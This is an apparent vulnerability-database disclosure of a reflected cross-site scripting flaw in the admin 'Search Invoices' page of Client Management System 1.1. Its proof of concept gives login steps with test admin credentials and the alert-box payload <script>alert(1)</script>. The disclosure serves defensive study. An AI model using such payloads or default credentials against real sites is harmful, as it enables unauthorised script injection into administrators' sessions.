Client Management System 1.1 - Reflected Cross Site Scripting (XSS) in 'Search Invoices' on admin panel

2021.06.15

BHAVESH KAUL (SE)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: Client Management System 1.1 - Reflected Cross Site Scripting (XSS) in 'Search Invoices' on admin panel
# Date: 14 June 2021
# Exploit Author: BHAVESH KAUL
# Author Linkedin: https://www.linkedin.com/in/bhavesh-kaul-cs/
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/
# Version: 1.1
# Tested on: Server: XAMPP
# Description #
Client Management System 1.1 is vulnerable to reflected cross site scripting because of insufficient user supplied data sanitization.
# Proof of Concept (PoC) : Exploit #
1) Goto: http://localhost/clientms/admin/index.php
2) Login as admin using test credentials: admin/Test@123
3) Goto: http://localhost/clientms/admin/search-invoices.php
4) Enter the following payload in the user name field: <script>alert(1)</script>
5) Click on Search
6) Our payload is fired and popped alert

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Client Management System 1.1 - Reflected Cross Site Scripting (XSS) in 'Search Invoices' on admin panel

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.